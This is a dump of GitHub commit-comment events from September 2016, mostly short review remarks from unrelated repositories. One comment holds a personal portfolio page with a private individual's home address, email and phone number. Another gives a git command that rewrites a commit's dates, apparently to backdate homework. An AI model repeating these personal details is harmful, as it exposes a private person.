{"id":"4614852289","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19165167,"position":null,"line":null,"path":null,"commit_id":"f2ed56ab3e9335de7cf6e3f89b9f1a6fb8f43a6b","created_at":"2016-09-25T20:10:37Z","updated_at":"2016-09-25T20:10:37Z","body":"Figuring out PathFinder and how to use this code for real: [gist](https://gist.github.com/sethten/cfeae1a7b294ebe1327ba744d83a53f9)"}},"created_at":"2016-09-25T20:10:37Z"}
{"id":"4614856714","type":"CommitCommentEvent","actor":{"login":"SavageCore"},"repo":{"name":"SavageCore/new-retro-arcade-neon-attract-screen-tool"},"payload":{"comment":{"id":19165173,"position":null,"line":null,"path":null,"commit_id":"5773facdb0976486b153a69d3686cc182d4fa67c","created_at":"2016-09-25T20:13:18Z","updated_at":"2016-09-25T20:13:18Z","body":"Remove duplicate line #3"}},"created_at":"2016-09-25T20:13:18Z"}
{"id":"4614857514","type":"CommitCommentEvent","actor":{"login":"zone117x"},"repo":{"name":"clintar/node-cryptonote-pool"},"payload":{"comment":{"id":19165175,"position":null,"line":null,"path":null,"commit_id":"557e7415cde79bbde4c6fd245a8c3b446bceea19","created_at":"2016-09-25T20:13:48Z","updated_at":"2016-09-25T20:13:48Z","body":"Could you pull request this into main repo?"}},"created_at":"2016-09-25T20:13:48Z"}
{"id":"4614857695","type":"CommitCommentEvent","actor":{"login":"thomasjbradley"},"repo":{"name":"aaryllins/html-validation-fixes"},"payload":{"comment":{"id":19165176,"position":null,"line":null,"path":null,"commit_id":"98641fd3169f6bfdd72971879eebcb0cc84bff49","created_at":"2016-09-25T20:13:55Z","updated_at":"2016-09-25T20:13:55Z","body":"If you look on GitHub, here:\r\nhttps://github.com/aaryllins/html-validation-fixes\r\n\r\nYou can see the `index.html` is fixed now—so you've done it properly. And it works, I just tried it.\r\nThough, you may notice something whacky about the `images` folder.\r\n\r\n---\r\n\r\n> (As an additional note, I still need you to authorize my github url for me to submit my finished work through markbot. Sorry!)\r\n\r\nAlready done—I did respond to your message in Canvas."}},"created_at":"2016-09-25T20:13:55Z"}
{"id":"4614859047","type":"CommitCommentEvent","actor":{"login":"hamza-shami"},"repo":{"name":"hamza-shami/test"},"payload":{"comment":{"id":19165179,"position":null,"line":null,"path":null,"commit_id":"f84e8cd471409f2e0e720029e50679cc64eae598","created_at":"2016-09-25T20:14:49Z","updated_at":"2016-09-25T20:14:49Z","body":"<!DOCTYPE html>\r\n<html>\r\n    <head>\r\n    <meta charset=\"utf-8\"/>\r\n    <title>General Project</title>\r\n    <link rel=\"stylesheet\" href=\"css/style.css\"/>\r\n    <link rel=\"stylesheet\" href=\"css/normalize.css\"/>\r\n        \r\n    </head>\r\n        <body>\r\n            <!--Start Header-->\r\n             <div class= \"header\">\r\n                <div class=\"slidbar\">\r\n                    <div class=\"container\">\r\n                        <div class=\"intro\">\r\n                        <h2>Web Designer & Programer</h2>\r\n                        \r\n                        </div>\r\n                    </div>\r\n                </div>\r\n                <div class=\"navbar\">\r\n                    <div class=\"container\">\r\n                        <h2><span>H</span>amza<span>H</span></h2>\r\n                        <ul>\r\n                            <li><a href=\"#\">Home</a></li>\r\n                            <li><a href=\"#\">About Us</a></li>\r\n                            <li><a href=\"#\">Resume</a></li>\r\n                            <li><a href=\"#\">Testemonial</a></li>\r\n                            <li><a href=\"#\">Portofolio</a></li>\r\n                            <li><a href=\"#\">Contact Me</a></li>\r\n                        </ul>\r\n                    </div>\r\n                </div>\r\n             </div>\r\n            <!--End Header-->\r\n\r\n            <!--Start Features-->\r\n            <div class=\"features\">\r\n                <div class=\"container\">\r\n                    <div class=\"feat\">\r\n                        <h2>Values</h2>\r\n                    <p>Hi Iam hamzosh Iam an expert designer I have a lot of\r\n                    great projectsHi Iam hamzosh Iam an expert designer.\r\n                    </p></div>\r\n                    <div class=\"feat\">\r\n                        <h2>Goal</h2>\r\n                    <p>Hi Iam hamzosh Iam an expert designer I have a lot\r\n                    of great projectsHi Iam hamzosh Iam an expert designer.\r\n                    </p></div>\r\n                    <div class=\"feat\">\r\n                        <h2>Hobbies</h2>\r\n                    <p>Hi Iam hamzosh Iam an expert designer I have a lot of great\r\n                    projectsHi Iam hamzosh Iam an expert designer.\r\n                    </p></div>\r\n                </div>\r\n            </div>\r\n            <!-- End Features-->\r\n            \r\n                <!--Start About me-->\r\n            <div class=\"about\">\r\n                <div class=\"container\">\r\n                    <div class=\"image\">\r\n                        <img src=\"images/photo.jpg\" alt=\"test\">\r\n                    </div>\r\n                    <div class=\"info\">\r\n                        <h2>About Me</h2>\r\n                            <p>Hi Iam hamzosh Iam an expert designer I have a lot of great\r\n                                projectsHi Iam hamzosh Iam an expert designer\r\n                                projectsHi Iam hamzosh Iam an expert designer.</p>\r\n                            <p> projectsHi Iam hamzosh Iam an expert designer\r\n                                projectsHi Iam hamzosh Iam an expertprojectsHi Iam hamzosh Iam an expert designer.</p>\r\n                            \r\n                            \r\n                            \r\n                            <div class=\"hobbies\">\r\n                                <div class=\"content\"> <div class=\"icon\">\r\n                                    <img src=\"images/web1.png\" alt=\"\">\r\n                                </div>\r\n                                <div class=\"text\">\r\n                                    <h3>Web Desing</h3>\r\n                                    <p>projectsHi Iam hamzosh Iam an expert designer\r\n                                    projectsHi Iam hamzosh Iam an expertprojects.</p>\r\n                                </div></div>\r\n                               \r\n                                <div class=\"content\"><div class=\"icon\">\r\n                                    <img src=\"images/graghic.png\" alt=\"\">\r\n                                </div>\r\n                                <div class=\"text\">\r\n                                    <h3>Graphic Design</h3>\r\n                                    <p>projectsHi Iam hamzosh Iam an expert designer\r\n                                    projectsHi Iam hamzosh Iam an expertprojects.</p>\r\n                                </div>\r\n                                </div>\r\n                                \r\n                                <div class=content>\r\n                                    <div class=\"icon\">\r\n                                    <img src=\"images/marketing1.png\" alt=\"\">\r\n                                </div>\r\n                                <div class=\"text\">\r\n                                    <h3>Marketing</h3>\r\n                                    <p>projectsHi Iam hamzosh Iam an expert designer\r\n                                    projectsHi Iam hamzosh Iam an expertprojects.</p>\r\n                                </div>\r\n                                </div>\r\n                                \r\n                                <div class=\"content\">\r\n                                   <div class=\"icon\">\r\n                                    <img src=\"images/web.png\" alt=\"\">\r\n                                </div>\r\n                                <div class=\"text\">\r\n                                    <h3>SEO</h3>\r\n                                    <p>projectsHi Iam hamzosh Iam an expert designer\r\n                                    projectsHi Iam hamzosh Iam an expertprojects.</p>\r\n                                </div> \r\n                                </div>\r\n                                \r\n                             \r\n                          </div>\r\n                            \r\n                    </div>\r\n                </div>\r\n            </div>\r\n            \r\n            <!--End About me-->\r\n            \r\n            <!--Start Skills me-->\r\n            <div class=\"myskills\">\r\n                <div class=\"container\">\r\n                    <div class=\"skills\">\r\n                        <h2>My Skills</h2>\r\n                        <p>Hi Iam hamzosh Iam an expert designer I have a lot of great\r\n                    projectsHi Iam hamzosh Iam an expert designer\r\n                    Hi Iam hamzosh Iam an expert designe.</p>\r\n                        <button>Contact Me</button>\r\n                    </div>\r\n                    \r\n                    <div class=\"progress\">\r\n                        <div class=\"teqnique\">\r\n                            <h3>HTML / CSS</h3>\r\n                            <div><span style=\"width: 85%\"><strong>Done 90% &nbsp;</strong></span></div>\r\n                        </div>\r\n                          <div class=\"teqnique\">\r\n                            <h3>Java Script</h3>\r\n                            <div><span style=\"width:65%\"><strong>Studieing &nbsp;</strong></span></div>\r\n                        </div>\r\n                            <div class=\"teqnique\">\r\n                            <h3>MySQL</h3>\r\n                            <div><span style=\"width:50% \"><strong>Soon &nbsp;</strong></span></div>\r\n                        </div>\r\n                              <div class=\"teqnique\">\r\n                            <h3>PHP</h3>\r\n                            <div><span style=\"width:50% \"><strong>Soon &nbsp;</strong></span></div>\r\n                        </div>\r\n                        \r\n                    </div>\r\n                </div>\r\n            </div>\r\n            <!--End Skills me-->\r\n\r\n          <!--Start Resume -->\r\n      <div class=\"resume\">\r\n        <div class=\"container\">\r\n            <h2>Resume</h2>\r\n            <p>Hi Iam hamzosh Iam an expert designer I have a lot of great\r\n                    projectsHi Iam hamzosh Iam an expert designerprojectsHi Iam hamzosh Iam an expert designer\r\n                    Hi Iam hamzosh Iam an expert designHi Iam hamzosh Iam an expert designer I have a lot of great</p>\r\n           <button>Download Resume</button>\r\n        </div>\r\n      </div>\r\n      \r\n         <!-- End Resume -->\r\n         \r\n         \r\n          <!--Start Education-->\r\n            <div class=\"myeducation\">\r\n                <div class=\"container\">\r\n                    <div class=\"main\">\r\n                        <h2>My Education</h2>\r\n                        <p>Hi Iam hamzosh Iam an expert designer I have a lot of great\r\n                    projectsHi Iam hamzosh Iam an expert designer\r\n                    Hi Iam hamzosh Iam an expert designe</p>\r\n                        \r\n                        <p>Hi Iam hamzosh Iam an expert designer I have a lot of great\r\n                    projectsHi Iam hamzosh Iam an expert designer\r\n                    Hi Iam hamzosh Iam an expert designe</p>\r\n                    </div>\r\n                    \r\n                    <div class=\"exp\">\r\n                      <h2>Programming Diploma</h2>\r\n                      <p>Hi Iam hamzosh Iam an expert designer I have a lot of great\r\n                    projectsHi Iam hamzosh Iam an expert designer\r\n                    Hi Iam hamzosh Iam an expert designe</p>\r\n                      <button>View</button>\r\n                    </div>\r\n                    <div class=\"clearfix\"></div>\r\n                    \r\n            </div>\r\n            \r\n            <!--End Education -->\r\n            <!-- Start Tesimonial -->\r\n            <div class=\"testimonial\">\r\n        <div class=\"container\">\r\n            <p>Hi Iam hamzosh Iam an expert designer I have a lot of great\r\n                    projectsHi Iam hamzosh Iam an expert designer\r\n                    Hi Iam hamzosh Iam an expert designHi Iam hamzosh Iam an</p>\r\n                    <h3>HamzaH</h3>\r\n                    <ul>\r\n                        <li></li>\r\n                        <li class=\"active\"></li>\r\n                        <li></li>\r\n                        <li></li>\r\n                     </ul>\r\n                    \r\n        </div>\r\n      </div>\r\n                      <!-- End Tesimonial -->\r\n                      \r\n                      <!-- Start Portfolio -->\r\n             <div class= \"portfolio\">\r\n                <div class= \"container\">\r\n                    <h2>Portfolio</h2>\r\n                    <p>Hi Iam hamzosh Iam an expert designer I have a lot of great\r\n                    projectsHi Iam hamzosh Iam an expert designer\r\n                    Hi Iam hamzosh Iam an expert designHi Iam hamzosh Iam an</p>\r\n                    <div class=\"ourwork\">\r\n                        <div><img src= \"images/portfolio/01.jpg\" alt=\"\"></div>\r\n                        <div><img src= \"images/portfolio/02.jpg\" alt=\"\"></div>\r\n                        <div><img src= \"images/portfolio/03.jpg\" alt=\"\"></div>\r\n                        <div><img src= \"images/portfolio/04.png\" alt=\"\"></div>\r\n                        <div><img src= \"images/portfolio/05.png\" alt=\"\"></div>\r\n                        <div><img src= \"images/portfolio/06.jpg\" alt=\"\"></div>\r\n                        <div><img src= \"images/portfolio/07.jpg\" alt=\"\"></div>\r\n                        <div><img src= \"images/portfolio/08.jpg\" alt=\"\"></div>\r\n                        <div><img src= \"images/portfolio/09.jpg\" alt=\"\"></div>     \r\n                    </div>\r\n                </div>\r\n             </div>         \r\n                    <!-- End Portfolio -->\r\n                    \r\n                    <!-- Start Contact me-->\r\n                    <div class=\"contactme\">\r\n                        <div class=\"container\">\r\n                            <div class=\"info\">\r\n                                <h2>Contatc Me</h2>\r\n                                <p>Hi Iam hamzosh Iam an expert designer I have a lot of\r\n                                greatHi Iam hamzosh Iam an expert designer I have a lot of\r\n                                    projectsHi Iam hamzosh Iam an expert designer</p>\r\n                                <p>Hagagatan 6 A, <br>\r\n                                Ronneby 32735,<br>\r\n                                Sweden.</p>\r\n                                <p><strong>Email: </strong>hmdhmzshami@gmail.com<br>\r\n                                <strong>Phone: </strong>0046731073217</p>\r\n                            </div>\r\n                            <form class=\"form\">\r\n                                <label>Name *</label>\r\n                                <input type=\"text\">\r\n                                <label>Email Address*</label>\r\n                                <input type=\"text\">\r\n                                <label>Massage *</label>\r\n                                <textarea></textarea>\r\n                                <input type=\"submit\" value=\"Contact Me\">\r\n                            </form>\r\n                        </div>\r\n                    </div>\r\n                    \r\n                    <!-- End Contact me-->\r\n                    \r\n                     <!--Start Footer-->\r\n                     \r\n                     <div class=\"footer\">\r\n                        <div class=\"container\">Copy Rights &copy; 2016 Mouhammed Hamza Shami</div>\r\n                     </div>\r\n                     <!-- End Footer-->\r\n\r\n        </body>\r\n</html>"}},"created_at":"2016-09-25T20:14:49Z"}
{"id":"4614859081","type":"CommitCommentEvent","actor":{"login":"WesGilster"},"repo":{"name":"Photocentric3D/Photonic3D"},"payload":{"comment":{"id":19165180,"position":null,"line":null,"path":null,"commit_id":"ca031fc39736757d84de4f2837f1521228f447aa","created_at":"2016-09-25T20:14:50Z","updated_at":"2016-09-25T20:14:50Z","body":"This looks interesting."}},"created_at":"2016-09-25T20:14:50Z"}
{"id":"4614859281","type":"CommitCommentEvent","actor":{"login":"ivandrofly"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":19165182,"position":17,"line":17,"path":"libse/SubtitleFormats/PhoenixSubtitle.cs","commit_id":"c1188fefc0387b829d6419028e333f6d7be15d63","created_at":"2016-09-25T20:14:58Z","updated_at":"2016-09-25T20:14:58Z","body":"> Perhaps, allow optional white space while parsing?\r\n\r\nOh yeah, that was my intension too, but I keep it that way to avoid collision with subtitle format that shares same formatting style.\r\n\r\nPS: Still doing some analysis will be changed :) thx."}},"created_at":"2016-09-25T20:14:58Z"}
{"id":"4614859531","type":"CommitCommentEvent","actor":{"login":"moritzhoewer"},"repo":{"name":"moritzhoewer/ADP-WS16"},"payload":{"comment":{"id":19165183,"position":22,"line":98,"path":"src/adp/aufgabe2/test/TestPrimeFinder.java","commit_id":"474e278c33060d10e486de368d0057463554fbac","created_at":"2016-09-25T20:15:07Z","updated_at":"2016-09-25T20:15:07Z","body":"Die Method Refference ist falsch, da sollte \"pf::ErastosthenesPrimeFinder\" stehen"}},"created_at":"2016-09-25T20:15:07Z"}
{"id":"4614859888","type":"CommitCommentEvent","actor":{"login":"apwelsh"},"repo":{"name":"9gag-open-source/LMAlertView"},"payload":{"comment":{"id":19165184,"position":5,"line":27,"path":"LMAlertView/LMAlertView.h","commit_id":"31948dba64b6c6334084db01b4406cd19e10f455","created_at":"2016-09-25T20:15:19Z","updated_at":"2016-09-25T20:15:19Z","body":"To support frameworks, use:\r\n\r\n#import &lt;RBBAnimation/RBBSpringAnimation.h&gt;"}},"created_at":"2016-09-25T20:15:19Z"}
{"id":"4614861115","type":"CommitCommentEvent","actor":{"login":"dmalan"},"repo":{"name":"cs50/help50"},"payload":{"comment":{"id":19165187,"position":null,"line":null,"path":null,"commit_id":"56585f887604866a5e285bdf31cf511f8b467acc","created_at":"2016-09-25T20:16:07Z","updated_at":"2016-09-25T20:16:07Z","body":"@brianyu28 I removed the `...` after all, but it'll still be good to have in, e.g., multi-line `valgrind` output in between substrings. Didn't seem necessary to indicate `...` after `before` by default, though, given that `help50` still shows all lines of output before the yellow help."}},"created_at":"2016-09-25T20:16:07Z"}
{"id":"4614861758","type":"CommitCommentEvent","actor":{"login":"apwelsh"},"repo":{"name":"9gag-open-source/LMAlertView"},"payload":{"comment":{"id":19165190,"position":5,"line":12,"path":"LMAlertView/LMAlertView.m","commit_id":"31948dba64b6c6334084db01b4406cd19e10f455","created_at":"2016-09-25T20:16:32Z","updated_at":"2016-09-25T20:16:32Z","body":"To support frameworks use:\r\n\r\n`#import <CAAnimationBlocks/CAAnimation+Blocks.h>`"}},"created_at":"2016-09-25T20:16:32Z"}
{"id":"4614862654","type":"CommitCommentEvent","actor":{"login":"haimav"},"repo":{"name":"xdata-skylark/libskylark"},"payload":{"comment":{"id":19165194,"position":null,"line":null,"path":null,"commit_id":"b8b4c13369d79ab7a586d24a089bc44184cf4ae6","created_at":"2016-09-25T20:17:06Z","updated_at":"2016-09-25T20:17:06Z","body":"No you didn't. Just that the frequent API changes (SVD seems espeically a target for frequent changes) causes problems for us as various people get Elemental at different times. We made a decision to stick to a specific hash, which I violated so reverted.\r\n\r\nBTW, all this issues will be fixed when you have an official release... justsayin"}},"created_at":"2016-09-25T20:17:06Z"}
{"id":"4614863111","type":"CommitCommentEvent","actor":{"login":"apwelsh"},"repo":{"name":"9gag-open-source/LMAlertView"},"payload":{"comment":{"id":19165195,"position":5,"line":27,"path":"LMAlertView/LMAlertView.h","commit_id":"31948dba64b6c6334084db01b4406cd19e10f455","created_at":"2016-09-25T20:17:23Z","updated_at":"2016-09-25T20:17:23Z","body":"To support frameworks use:\r\n\r\n`#import <RBBAnimation/RBBSpringAnimation.h>`"}},"created_at":"2016-09-25T20:17:23Z"}
{"id":"4614864725","type":"CommitCommentEvent","actor":{"login":"dmalan"},"repo":{"name":"cs50/help50"},"payload":{"comment":{"id":19165200,"position":null,"line":null,"path":null,"commit_id":"8e6ed248309fe5ad895daf320df269889976fe24","created_at":"2016-09-25T20:18:24Z","updated_at":"2016-09-25T20:18:24Z","body":"@brianyu28 I changed the output to be more clear as to what the highlighted yellow now means:\r\n\r\n<img width=\"771\" alt=\"screen shot 2016-09-25 at 4 18 14 pm\" src=\"https://cloud.githubusercontent.com/assets/788678/18817995/ae54e23c-833b-11e6-90c1-18d6b5b13ea4.png\">\r\n"}},"created_at":"2016-09-25T20:18:24Z"}
{"id":"4614866286","type":"CommitCommentEvent","actor":{"login":"goldieshen"},"repo":{"name":"goldieshen/corpus-joyce-portrait-TEI"},"payload":{"comment":{"id":19165205,"position":null,"line":null,"path":null,"commit_id":"2dbbb833a75d31834f35cd9f37b6a4d4d8589a3a","created_at":"2016-09-25T20:19:22Z","updated_at":"2016-09-25T20:19:22Z","body":"Sorry, I forgot to include in the title that this is for Issue #43 (Geocodes)!"}},"created_at":"2016-09-25T20:19:22Z"}
{"id":"4614869798","type":"CommitCommentEvent","actor":{"login":"okan"},"repo":{"name":"sausozluk/web"},"payload":{"comment":{"id":19165212,"position":null,"line":null,"path":null,"commit_id":"c11d73495489d0a1b73a88fb5dfc52c417251e33","created_at":"2016-09-25T20:21:32Z","updated_at":"2016-09-25T20:21:32Z","body":"i love it ❤️ "}},"created_at":"2016-09-25T20:21:32Z"}
{"id":"4614870530","type":"CommitCommentEvent","actor":{"login":"ruddell"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":19165214,"position":12,"line":559,"path":"generators/client-2/index.js","commit_id":"768f8fa8b9aad043e7fd0b53f8df46c23e890909","created_at":"2016-09-25T20:22:01Z","updated_at":"2016-09-25T20:22:01Z","body":"We usually don't have the _ with html files (a few files have it though).  Fixed in #4210"}},"created_at":"2016-09-25T20:22:01Z"}
{"id":"4614872531","type":"CommitCommentEvent","actor":{"login":"aconanlai"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":19165217,"position":null,"line":null,"path":null,"commit_id":"2c7f4aada3392e43c84cec7293c6508a64614a5e","created_at":"2016-09-25T20:23:20Z","updated_at":"2016-09-25T20:23:20Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[FT-016] Client: Menu & container for archives, shows, shop, etc.](https://trello.com/c/woA4xOR5/22-ft-016-client-menu-container-for-archives-shows-shop-etc)"}},"created_at":"2016-09-25T20:23:20Z"}
{"id":"4614872772","type":"CommitCommentEvent","actor":{"login":"PokeWorldBW"},"repo":{"name":"po-devs/po-server-goodies"},"payload":{"comment":{"id":19165220,"position":null,"line":null,"path":null,"commit_id":"1586891793d95f2f8fe08fa85d0a88c132b8b3ef","created_at":"2016-09-25T20:23:28Z","updated_at":"2016-09-25T20:23:28Z","body":"While you're at it maybe add a bot to the message?"}},"created_at":"2016-09-25T20:23:28Z"}
{"id":"4614874666","type":"CommitCommentEvent","actor":{"login":"0xced"},"repo":{"name":"OData/RESTier"},"payload":{"comment":{"id":19165222,"position":69,"line":149,"path":"src/Microsoft.Restier.Publishers.OData/Routing/HttpConfigurationExtensions.cs","commit_id":"3d7a54cbaeca852b7581611c22d4bad5ee9c8045","created_at":"2016-09-25T20:24:39Z","updated_at":"2016-09-25T20:24:39Z","body":"Given `GetUseVerboseErrors` implementation, I think you meant\r\n```\r\nconfiguration.Properties[UseVerboseErrorsFlagKey] = useVerboseErrors;\r\n```\r\ninstead of\r\n```\r\nconfiguration.Properties[useVerboseErrors] = useVerboseErrors;\r\n```"}},"created_at":"2016-09-25T20:24:39Z"}
{"id":"4614874682","type":"CommitCommentEvent","actor":{"login":"huanghuiwen"},"repo":{"name":"huanghuiwen/test"},"payload":{"comment":{"id":19165223,"position":5,"line":3,"path":"testGitHub 2.txt","commit_id":"9d0351a44e191fa56c2921056b35b50c19758518","created_at":"2016-09-25T20:24:40Z","updated_at":"2016-09-25T20:24:40Z","body":"dd"}},"created_at":"2016-09-25T20:24:40Z"}
{"id":"4614879476","type":"CommitCommentEvent","actor":{"login":"dariosalvi78"},"repo":{"name":"dariosalvi78/cordova-plugin-health"},"payload":{"comment":{"id":19165231,"position":131,"line":131,"path":"activities_map.md","commit_id":"19c71d3d94bc199b5e4ab9496d10372a5e78ac1e","created_at":"2016-09-25T20:27:57Z","updated_at":"2016-09-25T20:27:57Z","body":"well spotted !!!"}},"created_at":"2016-09-25T20:27:57Z"}
{"id":"4614882690","type":"CommitCommentEvent","actor":{"login":"SavageCore"},"repo":{"name":"SavageCore/new-retro-arcade-neon-attract-screen-tool"},"payload":{"comment":{"id":19165236,"position":null,"line":null,"path":null,"commit_id":"0eeceeeeebb259fa4d58c681e1e6e2da2b1c1441","created_at":"2016-09-25T20:30:13Z","updated_at":"2016-09-25T20:30:13Z","body":"I meant #2 ... This make 2 work!"}},"created_at":"2016-09-25T20:30:13Z"}
{"id":"4614882781","type":"CommitCommentEvent","actor":{"login":"JoeBanks13"},"repo":{"name":"Onebot-Nexus/Onebot"},"payload":{"comment":{"id":19165237,"position":null,"line":null,"path":null,"commit_id":"bad188bee1e6ab8f6d9c5ee159d515c5cf53939e","created_at":"2016-09-25T20:30:15Z","updated_at":"2016-09-25T20:30:15Z","body":"Noice"}},"created_at":"2016-09-25T20:30:15Z"}
{"id":"4614884198","type":"CommitCommentEvent","actor":{"login":"ayufan"},"repo":{"name":"ayufan-pine64/device-pine64-common"},"payload":{"comment":{"id":19165242,"position":null,"line":null,"path":null,"commit_id":"5c99e4fc71cebd0004b8e006eb9fe3138150f044","created_at":"2016-09-25T20:31:05Z","updated_at":"2016-09-25T20:31:05Z","body":"I did revert, we will see :)"}},"created_at":"2016-09-25T20:31:05Z"}
{"id":"4614887563","type":"CommitCommentEvent","actor":{"login":"JaradAPCS"},"repo":{"name":"JaradAPCS/wiredcats-ftc_app-master-old"},"payload":{"comment":{"id":19165248,"position":null,"line":null,"path":null,"commit_id":"5ec7c6d44c9f0f3fc8d9f7e865ffa2b92e7e69b4","created_at":"2016-09-25T20:33:24Z","updated_at":"2016-09-25T20:33:24Z","body":"what in the bloody hell!"}},"created_at":"2016-09-25T20:33:24Z"}
{"id":"4614893312","type":"CommitCommentEvent","actor":{"login":"Arman681"},"repo":{"name":"JaradAPCS/wiredcats-ftc_app-master-old"},"payload":{"comment":{"id":19165269,"position":null,"line":null,"path":null,"commit_id":"5ec7c6d44c9f0f3fc8d9f7e865ffa2b92e7e69b4","created_at":"2016-09-25T20:37:18Z","updated_at":"2016-09-25T20:37:18Z","body":"LOL!"}},"created_at":"2016-09-25T20:37:18Z"}
{"id":"4614893412","type":"CommitCommentEvent","actor":{"login":"henno"},"repo":{"name":"henno/halo"},"payload":{"comment":{"id":19165270,"position":null,"line":null,"path":null,"commit_id":"73eddfb24c3cc6754060052c2fe0f12b17b4548a","created_at":"2016-09-25T20:37:21Z","updated_at":"2016-09-25T20:37:21Z","body":"Kudos"}},"created_at":"2016-09-25T20:37:21Z"}
{"id":"4614895504","type":"CommitCommentEvent","actor":{"login":"heldub"},"repo":{"name":"heldub/hello-world"},"payload":{"comment":{"id":19165277,"position":null,"line":null,"path":null,"commit_id":"5d38b75834eb1669b225f0495638db4451a9dfe2","created_at":"2016-09-25T20:38:49Z","updated_at":"2016-09-25T20:38:49Z","body":"GitHub, adventure begins "}},"created_at":"2016-09-25T20:38:49Z"}
{"id":"4614900806","type":"CommitCommentEvent","actor":{"login":"javirochin"},"repo":{"name":"javirochin/tarea1"},"payload":{"comment":{"id":19165287,"position":null,"line":null,"path":null,"commit_id":"bd4fa54b47b2de22445231ed958a4fb937bf39d2","created_at":"2016-09-25T20:42:14Z","updated_at":"2016-09-25T20:42:14Z","body":"git filter-branch --env-filter \\\r\n    'if [ \"$GIT_COMMIT\" == \"bd4fa54b47b2de22445231ed958a4fb937bf39d2\" ]\r\n         then\r\n                  export GIT_AUTHOR_DATE=\"2016-03-20T05:57:12-03:00\"\r\n                  export GIT_COMMITTER_DATE=\"2016-03-20T05:57:12-03:00\"\r\n     fi'"}},"created_at":"2016-09-25T20:42:14Z"}
{"id":"4614902448","type":"CommitCommentEvent","actor":{"login":"Nenkai"},"repo":{"name":"TheSharks/WildBeast"},"payload":{"comment":{"id":19165291,"position":null,"line":null,"path":null,"commit_id":"79b3d2a24bb9e7f8fa9b898f62a718d672fcfdc9","created_at":"2016-09-25T20:43:18Z","updated_at":"2016-09-25T20:43:18Z","body":"👍 👀 "}},"created_at":"2016-09-25T20:43:18Z"}
{"id":"4614903657","type":"CommitCommentEvent","actor":{"login":"sangisos"},"repo":{"name":"sangisos/gocc"},"payload":{"comment":{"id":19165295,"position":null,"line":null,"path":null,"commit_id":"e3f85c18a03d9da89bb5dc2209b3463e6df1a612","created_at":"2016-09-25T20:44:05Z","updated_at":"2016-09-25T20:44:05Z","body":"Updates #14"}},"created_at":"2016-09-25T20:44:05Z"}
{"id":"4614906637","type":"CommitCommentEvent","actor":{"login":"dougmoscrop"},"repo":{"name":"Nordstrom/serverless"},"payload":{"comment":{"id":19165302,"position":null,"line":null,"path":null,"commit_id":"2f99b332a6bc5c05f0ad0e738bb497e15e4263b7","created_at":"2016-09-25T20:46:01Z","updated_at":"2016-09-25T20:46:01Z","body":"I don't think this change is necessary -- serverless.utils already does json/yaml parsing based on suffix."}},"created_at":"2016-09-25T20:46:01Z"}
{"id":"4614907616","type":"CommitCommentEvent","actor":{"login":"cyberolum"},"repo":{"name":"Anar97/Slider-"},"payload":{"comment":{"id":19165304,"position":null,"line":null,"path":null,"commit_id":"fd1d67fd2478a0674373ea7e0bfd3dccf3ba8b76","created_at":"2016-09-25T20:46:39Z","updated_at":"2016-09-25T20:46:39Z","body":"Aydindi. Baxiram "}},"created_at":"2016-09-25T20:46:39Z"}
{"id":"4614908665","type":"CommitCommentEvent","actor":{"login":"DzmitrySV"},"repo":{"name":"MaximDanilov/GIIS"},"payload":{"comment":{"id":19165307,"position":null,"line":null,"path":null,"commit_id":"527a6f13abab58155bca48552308560d4a9fe5ae","created_at":"2016-09-25T20:47:20Z","updated_at":"2016-09-25T20:47:20Z","body":"Координаты правильно рассчитывались только для 4-ой(1-ой) четверти. Как универсально посчитать координаты не придумал, так что достал костыли из чулана."}},"created_at":"2016-09-25T20:47:20Z"}
{"id":"4614909510","type":"CommitCommentEvent","actor":{"login":"bwwagner"},"repo":{"name":"bwwagner/ALytlePokerGame"},"payload":{"comment":{"id":19165309,"position":null,"line":null,"path":null,"commit_id":"0e7fd95587089580b6d71fca468e384de914ff3a","created_at":"2016-09-25T20:47:50Z","updated_at":"2016-09-25T20:47:50Z","body":"Changed the images resources to a relative path in \"./src/Resources/Images/\" to help with resource loading from a default installation.  #1 "}},"created_at":"2016-09-25T20:47:50Z"}
{"id":"4614909847","type":"CommitCommentEvent","actor":{"login":"Andrey1960"},"repo":{"name":"Andrey1960/php2"},"payload":{"comment":{"id":19165312,"position":null,"line":null,"path":null,"commit_id":"34a607d3978ca1335079570ba484c9331b9c522c","created_at":"2016-09-25T20:48:04Z","updated_at":"2016-09-25T20:48:04Z","body":"Hello World"}},"created_at":"2016-09-25T20:48:04Z"}
{"id":"4614910453","type":"CommitCommentEvent","actor":{"login":"edgarriba"},"repo":{"name":"edgarriba/tiny-cnn"},"payload":{"comment":{"id":19165314,"position":null,"line":null,"path":null,"commit_id":"d232db30c1f9ae5c3a8721c3d271a15ed86d644b","created_at":"2016-09-25T20:48:29Z","updated_at":"2016-09-25T20:48:29Z","body":"@nyanp I got the following error when I set `USE_SERIALIZER=OFF`\r\n\r\n/home/eriba/software/tiny-cnn/tiny_dnn/util/serialization_helper.h:99:9: error: static assertion failed: You are using save/load functions, but serialization function is disabled in current configuration.\r\n\r\nYou need to undef CNN_NO_SERIALIZATION to enable these functions.\r\nIf you are using cmake, you can use -DUSE_SERIALIZER=ON option.\r\n\r\n\r\n         static_assert(false, \"You are using save/load functions, but serialization function is disabled in current configuration.\\n\\n\"\r\n         "}},"created_at":"2016-09-25T20:48:29Z"}
{"id":"4614914085","type":"CommitCommentEvent","actor":{"login":"shawnwahi"},"repo":{"name":"CypherOS/frameworks_base"},"payload":{"comment":{"id":19165325,"position":null,"line":null,"path":null,"commit_id":"4b4202d7f27013993a5bdb402c45bc5e18d08f73","created_at":"2016-09-25T20:50:55Z","updated_at":"2016-09-25T20:50:55Z","body":"WTF! I'm sorry but I had to say something. There is NO way you wrote all these commits for fwb. You clearly don't know what preserving commit history/authorship means (-_-). There is no other way to put it but you are a terrible developer. Sorry until you learn how to dev properly."}},"created_at":"2016-09-25T20:50:55Z"}
